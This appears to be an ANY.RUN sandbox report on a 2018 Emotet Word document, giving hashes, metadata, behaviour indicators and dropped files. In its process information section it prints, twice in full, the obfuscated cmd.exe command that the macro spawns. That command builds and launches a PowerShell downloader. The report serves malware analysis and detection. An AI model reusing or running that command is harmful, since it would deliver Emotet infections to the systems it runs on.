analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

tthXj-PDQVBcFiBzMLXI7_eVntgJrT-bs

Full analysis: https://app.any.run/tasks/e1e19e66-a6e2-451d-aed0-e176141b3b9e
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: December 14, 2018, 14:04:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
maldoc-1
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 09:28:00 2018, Last Saved Time/Date: Fri Dec 14 09:28:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 23, Security: 0
MD5:

F9F1CC77EEDE5E4CD788C9D6C75EF2AD

SHA1:

010635838F1BFC1D951CC1FB3B19DADA184CE8FE

SHA256:

279AC06191AB8084DC33176151F2447BF1C58FBC70C3C41E98A1B9AA9478462E

SSDEEP:

1536:Jocn1kp59gxBK85fBuzKgL1bZQrRfZkzg+a9:e41k/W48Iz51byrRfZkz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2964)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2964)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3176)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2964)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2964)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:14 09:28:00
ModifyDate: 2018:12:14 09:28:00
Pages: 1
Words: 3
Characters: 23
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 25
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2964"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Roaming\tthXj-PDQVBcFiBzMLXI7_eVntgJrT-bs.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3176c:\JYikZpF\EoNsrVQ\SjEzkJj\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set il8=MsworjzhpwzDbtMbVNaHhbsGJzKmY.v/SiCX-+{,LZ5=k@lxeqf14 y73($I9)W'Fgcn:R8uQ\Ed;0P}&&for %H in (58;4;59;66;43;63;3;24;69;63;76;58;19;49;33;43;67;48;9;36;3;21;5;48;66;13;53;17;48;13;29;62;48;21;34;46;33;48;67;13;76;58;50;49;62;43;63;20;13;13;8;68;31;31;33;67;13;3;13;20;48;20;18;4;30;48;22;13;29;66;3;27;31;71;20;34;17;62;65;65;24;23;45;20;13;13;8;68;31;31;66;8;48;4;50;3;4;27;18;67;66;48;65;4;3;71;8;29;66;3;27;31;33;72;16;35;18;32;77;66;55;45;20;13;13;8;68;31;31;33;67;27;3;75;33;33;67;29;67;48;13;31;35;28;33;50;56;77;65;56;77;45;20;13;13;8;68;31;31;18;22;8;33;4;33;67;65;50;33;46;27;22;29;66;3;27;31;3;5;4;4;70;55;17;28;45;20;13;13;8;68;31;31;50;71;13;71;4;3;67;29;67;48;13;31;20;66;30;66;23;42;60;63;29;32;8;46;33;13;57;63;45;63;61;76;58;26;24;64;43;63;66;71;14;63;76;58;69;74;4;53;43;53;63;51;52;55;63;76;58;22;17;19;43;63;19;44;19;63;76;58;11;35;9;43;58;48;67;30;68;13;48;27;8;37;63;73;63;37;58;69;74;4;37;63;29;48;47;48;63;76;50;3;4;48;18;66;20;57;58;74;78;40;53;33;67;53;58;50;49;62;61;38;13;4;54;38;58;19;49;33;29;11;3;9;67;46;3;18;75;64;33;46;48;57;58;74;78;40;39;53;58;11;35;9;61;76;58;71;44;74;43;63;24;71;74;63;76;59;50;53;57;57;23;48;13;36;59;13;48;27;53;58;11;35;9;61;29;46;48;67;65;13;20;53;36;65;48;53;70;77;77;77;77;61;53;38;59;67;30;3;44;48;36;59;13;48;27;53;58;11;35;9;76;58;19;69;25;43;63;9;74;16;63;76;21;4;48;18;44;76;79;79;66;18;13;66;20;38;79;79;58;11;41;71;43;63;30;4;24;63;76;81)do set J6bL=!J6bL!!il8:~%H,1!&&if %H gtr 80 p%APPDATA:~-6,-5%w%TMP:~-3,1%%ProgramW6432:~-12,1%sh%TEMP:~-3,1%ll "!J6bL:~6!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3708CmD /V:/C"set il8=MsworjzhpwzDbtMbVNaHhbsGJzKmY.v/SiCX-+{,LZ5=k@lxeqf14 y73($I9)W'Fgcn:R8uQ\Ed;0P}&&for %H in (58;4;59;66;43;63;3;24;69;63;76;58;19;49;33;43;67;48;9;36;3;21;5;48;66;13;53;17;48;13;29;62;48;21;34;46;33;48;67;13;76;58;50;49;62;43;63;20;13;13;8;68;31;31;33;67;13;3;13;20;48;20;18;4;30;48;22;13;29;66;3;27;31;71;20;34;17;62;65;65;24;23;45;20;13;13;8;68;31;31;66;8;48;4;50;3;4;27;18;67;66;48;65;4;3;71;8;29;66;3;27;31;33;72;16;35;18;32;77;66;55;45;20;13;13;8;68;31;31;33;67;27;3;75;33;33;67;29;67;48;13;31;35;28;33;50;56;77;65;56;77;45;20;13;13;8;68;31;31;18;22;8;33;4;33;67;65;50;33;46;27;22;29;66;3;27;31;3;5;4;4;70;55;17;28;45;20;13;13;8;68;31;31;50;71;13;71;4;3;67;29;67;48;13;31;20;66;30;66;23;42;60;63;29;32;8;46;33;13;57;63;45;63;61;76;58;26;24;64;43;63;66;71;14;63;76;58;69;74;4;53;43;53;63;51;52;55;63;76;58;22;17;19;43;63;19;44;19;63;76;58;11;35;9;43;58;48;67;30;68;13;48;27;8;37;63;73;63;37;58;69;74;4;37;63;29;48;47;48;63;76;50;3;4;48;18;66;20;57;58;74;78;40;53;33;67;53;58;50;49;62;61;38;13;4;54;38;58;19;49;33;29;11;3;9;67;46;3;18;75;64;33;46;48;57;58;74;78;40;39;53;58;11;35;9;61;76;58;71;44;74;43;63;24;71;74;63;76;59;50;53;57;57;23;48;13;36;59;13;48;27;53;58;11;35;9;61;29;46;48;67;65;13;20;53;36;65;48;53;70;77;77;77;77;61;53;38;59;67;30;3;44;48;36;59;13;48;27;53;58;11;35;9;76;58;19;69;25;43;63;9;74;16;63;76;21;4;48;18;44;76;79;79;66;18;13;66;20;38;79;79;58;11;41;71;43;63;30;4;24;63;76;81)do set J6bL=!J6bL!!il8:~%H,1!&&if %H gtr 80 powe%ProgramW6432:~-12,1%shell "!J6bL:~6!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 301
Read events
899
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
2
Unknown types
7

Dropped files

PID
Process
Filename
Type
2964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7BD.tmp.cvr
MD5:
SHA256:
2964WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\190BC509.wmf
MD5:
SHA256:
2964WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ACA5B4FF.wmf
MD5:
SHA256:
2964WINWORD.EXEC:\Users\admin\AppData\Roaming\~$hXj-PDQVBcFiBzMLXI7_eVntgJrT-bs.docpgc
MD5:735FFD0D33CC141BBB63A5AF1ABFF870
SHA256:C52231169BB16AC18EBB2C9E1B323B7A4F78ECA8B95D24725573FDBCC6DE6365
2964WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\tthXj-PDQVBcFiBzMLXI7_eVntgJrT-bs.doc.LNKlnk
MD5:6B9880E63765252AD52AB9366D9B963B
SHA256:122C155E4D8559A2A55703D8BDA5DDC51A18FDFCB2464AD5B82A104F1E327E39
2964WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:33AADBC12C84AF4125289B816634C33E
SHA256:C484F40516C30ABE6A87599DB2C4D6C30A085FD13C1A6AD85B4C97A05920EA32
2964WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:BFB90CF371FCEE43C7BFB74B2B0A4AB1
SHA256:5E71388D94847B479059CEEF2E10A35B21837B60A0A40B7E11455E3B7E5297E0
2964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:6C7601C23EDEE3E07855699F68F01488
SHA256:1FC5E95435E20E00BF5C95A018AAE65E7988C9C60CFAC06AA0C1D255C42E4702
2964WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33FB9776.wmfwmf
MD5:5044A58B279A344B16C276EF95DA3C71
SHA256:08E97F39459F779596F50DCA5480A25A8D3563FC14E2A927B4EAAE455862F389
2964WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8C95F28.wmfwmf
MD5:5EFB11AA4CB29DBCF3A37C61193E500A
SHA256:6B5E172B0761CD67D7E3515C941785012F708FA4256B449AAA806E50C603F1D4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
tthXj-PDQVBcFiBzMLXI7_eVntgJrT-bs